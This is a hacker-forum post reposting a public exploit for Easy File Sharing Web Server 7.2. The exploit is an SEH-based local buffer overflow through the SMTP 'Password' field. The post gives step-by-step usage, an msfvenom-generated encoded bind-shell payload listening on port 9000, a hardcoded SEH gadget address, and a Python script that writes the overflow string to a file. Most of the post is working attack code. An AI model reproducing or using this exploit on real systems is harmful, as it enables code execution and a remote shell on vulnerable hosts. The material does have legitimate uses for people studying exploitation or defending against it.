• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

文件共享Web Server 7.2本地缓冲区溢出漏洞


This Wind

Recommended Posts

发布内容作者:Felipe Winsnes                                             漏洞危害等级:critlow_3.gif〔高〕

 

# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH)
# Author: Felipe Winsnes
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7
 
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open fsws.exe
# 4.- Go to 'Options'
# 5.- Click upon 'SMTP Setup'
# 6.- Paste clipboard on bottom-right 'Password' parameter
# 7.- Profit
 
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/
 
import struct
 
# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 718 bytes
 
buf =  b""
buf += b"\x89\xe1\xdd\xc5\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x49\x78\x6e"
buf += b"\x62\x67\x70\x57\x70\x63\x30\x31\x70\x6f\x79\x78\x65"
buf += b"\x56\x51\x6b\x70\x72\x44\x6e\x6b\x70\x50\x70\x30\x6c"
buf += b"\x4b\x43\x62\x44\x4c\x4e\x6b\x46\x32\x54\x54\x4c\x4b"
buf += b"\x30\x72\x55\x78\x36\x6f\x68\x37\x30\x4a\x67\x56\x36"
buf += b"\x51\x6b\x4f\x4c\x6c\x65\x6c\x50\x61\x63\x4c\x54\x42"
buf += b"\x74\x6c\x67\x50\x59\x51\x5a\x6f\x36\x6d\x56\x61\x68"
buf += b"\x47\x4a\x42\x6a\x52\x70\x52\x63\x67\x6e\x6b\x73\x62"
buf += b"\x46\x70\x4e\x6b\x63\x7a\x77\x4c\x6c\x4b\x72\x6c\x36"
buf += b"\x71\x30\x78\x48\x63\x53\x78\x37\x71\x5a\x71\x43\x61"
buf += b"\x4c\x4b\x72\x79\x37\x50\x66\x61\x4a\x73\x4c\x4b\x52"
buf += b"\x69\x45\x48\x58\x63\x54\x7a\x30\x49\x6c\x4b\x64\x74"
buf += b"\x6e\x6b\x77\x71\x78\x56\x36\x51\x49\x6f\x6c\x6c\x6f"
buf += b"\x31\x68\x4f\x36\x6d\x73\x31\x78\x47\x45\x68\x69\x70"
buf += b"\x42\x55\x6c\x36\x35\x53\x51\x6d\x5a\x58\x75\x6b\x63"
buf += b"\x4d\x36\x44\x31\x65\x58\x64\x63\x68\x4e\x6b\x32\x78"
buf += b"\x47\x54\x46\x61\x4e\x33\x70\x66\x4e\x6b\x66\x6c\x30"
buf += b"\x4b\x6e\x6b\x51\x48\x47\x6c\x75\x51\x6e\x33\x6e\x6b"
buf += b"\x56\x64\x4c\x4b\x47\x71\x4e\x30\x6e\x69\x63\x74\x57"
buf += b"\x54\x57\x54\x31\x4b\x53\x6b\x61\x71\x32\x79\x33\x6a"
buf += b"\x46\x31\x79\x6f\x4d\x30\x73\x6f\x31\x4f\x43\x6a\x6c"
buf += b"\x4b\x37\x62\x48\x6b\x6e\x6d\x71\x4d\x51\x78\x74\x73"
buf += b"\x76\x52\x43\x30\x37\x70\x73\x58\x54\x37\x64\x33\x30"
buf += b"\x32\x61\x4f\x70\x54\x33\x58\x30\x4c\x61\x67\x31\x36"
buf += b"\x66\x67\x69\x6f\x6e\x35\x78\x38\x4a\x30\x46\x61\x33"
buf += b"\x30\x77\x70\x74\x69\x6a\x64\x31\x44\x50\x50\x72\x48"
buf += b"\x66\x49\x6d\x50\x70\x6b\x75\x50\x4b\x4f\x6e\x35\x43"
buf += b"\x5a\x56\x68\x61\x49\x70\x50\x48\x62\x49\x6d\x61\x50"
buf += b"\x62\x70\x33\x70\x56\x30\x70\x68\x39\x7a\x44\x4f\x39"
buf += b"\x4f\x79\x70\x69\x6f\x4e\x35\x5a\x37\x43\x58\x64\x42"
buf += b"\x63\x30\x57\x53\x34\x68\x6c\x49\x5a\x46\x73\x5a\x46"
buf += b"\x70\x32\x76\x62\x77\x35\x38\x5a\x62\x49\x4b\x74\x77"
buf += b"\x50\x67\x4b\x4f\x48\x55\x66\x37\x31\x78\x4f\x47\x68"
buf += b"\x69\x67\x48\x39\x6f\x49\x6f\x69\x45\x53\x67\x62\x48"
buf += b"\x71\x64\x58\x6c\x65\x6b\x78\x61\x39\x6f\x6a\x75\x36"
buf += b"\x37\x6d\x47\x61\x78\x70\x75\x62\x4e\x70\x4d\x45\x31"
buf += b"\x69\x6f\x4e\x35\x71\x78\x43\x53\x70\x6d\x65\x34\x77"
buf += b"\x70\x6c\x49\x7a\x43\x62\x77\x66\x37\x70\x57\x34\x71"
buf += b"\x49\x66\x42\x4a\x44\x52\x53\x69\x50\x56\x58\x62\x4b"
buf += b"\x4d\x72\x46\x39\x57\x53\x74\x75\x74\x77\x4c\x65\x51"
buf += b"\x66\x61\x4e\x6d\x31\x54\x45\x74\x66\x70\x39\x56\x47"
buf += b"\x70\x70\x44\x71\x44\x42\x70\x32\x76\x72\x76\x56\x36"
buf += b"\x61\x56\x70\x56\x42\x6e\x32\x76\x73\x66\x32\x73\x73"
buf += b"\x66\x72\x48\x63\x49\x38\x4c\x47\x4f\x6d\x56\x59\x6f"
buf += b"\x39\x45\x4f\x79\x39\x70\x52\x6e\x71\x46\x51\x56\x49"
buf += b"\x6f\x50\x30\x45\x38\x57\x78\x6c\x47\x47\x6d\x51\x70"
buf += b"\x6b\x4f\x69\x45\x4f\x4b\x79\x70\x57\x6d\x66\x4a\x76"
buf += b"\x6a\x70\x68\x4d\x76\x7a\x35\x4f\x4d\x4f\x6d\x6b\x4f"
buf += b"\x6a\x75\x35\x6c\x64\x46\x33\x4c\x37\x7a\x6f\x70\x4b"
buf += b"\x4b\x59\x70\x50\x75\x43\x35\x4f\x4b\x63\x77\x67\x63"
buf += b"\x32\x52\x62\x4f\x33\x5a\x73\x30\x56\x33\x39\x6f\x7a"
buf += b"\x75\x41\x41"
 
seh = struct.pack("<I", 0x1002324C) # 0x1002324c : pop esi # pop edi # ret  | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
nseh = struct.pack("<I", 0x06710870)
 
buffer = "A" * 512 + nseh + seh + "A" * 20 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
 
#   [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now